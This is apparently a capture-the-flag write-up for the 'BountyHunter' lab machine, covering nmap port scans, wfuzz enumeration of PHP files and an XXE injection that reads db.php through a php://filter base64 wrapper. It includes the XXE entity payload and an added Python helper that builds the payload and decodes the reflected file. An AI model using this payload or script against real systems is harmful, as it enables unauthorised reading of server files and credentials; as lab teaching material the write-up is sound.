Machine - BountyHunter
NMAP
Scan all TCP ports (SYN scan, no host discovery or DNS resolution, greppable output):
sudo nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.10.11.100 -oG x
Run default scripts and version detection against the open ports we found (22 and 80):
nmap -sC -sV -p80,22 10.10.11.100 -oN ports
Attack
After playing with the site a bit, there is a form that sends XML to the server. Maybe we can do an XXE?
XXE → https://github.com/payloadbox/xxe-injection-payload-list
Yay! We are able to read files :)
Let's use wfuzz to enumerate PHP files on the target (hide 404 responses):
$ wfuzz -w wordlist/general/common.txt --hc 404 http://10.10.11.100/FUZZ.php
There is a db.php file! :)
If we try to get the content of db.php directly, nothing useful comes back: the PHP source is dropped into the XML document as-is, so the <?php ... ?> block is swallowed as a processing instruction (and any stray < or & would make the document fail to parse). Wrapping the read in php://filter with base64 encoding turns the file into plain character data the parser accepts:
<!DOCTYPE replace [<!ENTITY ent SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/db.php"> ]>
Reference &ent; in the element whose value the page reflects, then base64-decode what comes back.
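The following is an added example, not code from the original writeup: it builds the php://filter payload above, shows with a local XML parser why the raw db.php read gives nothing while the base64-wrapped read is reflected, and decodes the blob from a response body. The element name <data>, the sample db.php content and the sample response page are all constructed placeholders; the real form's field names and the real file are whatever the box actually has.

```python
"""Helpers for the XXE file read via php://filter (added example, not the writeup's code)."""
import base64
import re
import xml.dom.minidom
from typing import Optional
from xml.parsers.expat import ExpatError

# Assumption: the form reflects the text of the element we put &ent; into.
# <data> is a placeholder for whichever field the real form uses.
BODY_TEMPLATE = "<data>&ent;</data>"


def build_payload(resource: str, body_template: str = BODY_TEMPLATE) -> str:
    """Build the XXE document: an external entity that reads `resource` through
    php://filter so the server-side parser sees base64 text instead of PHP."""
    system_id = f"php://filter/read=convert.base64-encode/resource={resource}"
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE replace [<!ENTITY ent SYSTEM "{system_id}"> ]>\n'
        f"{body_template}"
    )


def text_after_expansion(body_template: str, replacement: str) -> Optional[str]:
    """Mimic what the server's parser does once &ent; is replaced by the file
    content: parse the result and return the element's text, or None when the
    expanded document is no longer well-formed XML."""
    expanded = body_template.replace("&ent;", replacement)
    try:
        root = xml.dom.minidom.parseString(expanded).documentElement
    except ExpatError:
        return None
    return "".join(n.data for n in root.childNodes if n.nodeType == n.TEXT_NODE)


def extract_and_decode(response_text: str) -> bytes:
    """Pull the longest base64 run out of the HTTP response body and decode it."""
    runs = re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", response_text)
    if not runs:
        raise ValueError("no base64 blob found in response")
    return base64.b64decode(max(runs, key=len))


# Constructed stand-in for db.php (not the real file from the box).
SAMPLE_DB_PHP = (
    "<?php\n"
    "// constructed sample, not the real file\n"
    '$dbserver = "localhost";\n'
    '$dbuser = "admin";\n'
    '$dbpass = "changeme";\n'
    "?>"
)
SAMPLE_B64 = base64.b64encode(SAMPLE_DB_PHP.encode()).decode()
# Constructed response page that reflects the submitted field.
SAMPLE_RESPONSE = f"<td>Title</td><td>{SAMPLE_B64}</td>"

if __name__ == "__main__":
    print(build_payload("/var/www/html/db.php"))
    # Raw PHP is swallowed as a processing instruction: nothing is reflected.
    print(repr(text_after_expansion(BODY_TEMPLATE, SAMPLE_DB_PHP)))
    # Base64 is plain character data: reflected, then decoded locally.
    print(extract_and_decode(SAMPLE_RESPONSE).decode())
```

The local parse in text_after_expansion is only a model of the server side (expat here, libxml2 on the box), but both treat <?php ... ?> as a processing instruction and both reject a bare < in character data, which is exactly why the base64 wrapper is needed.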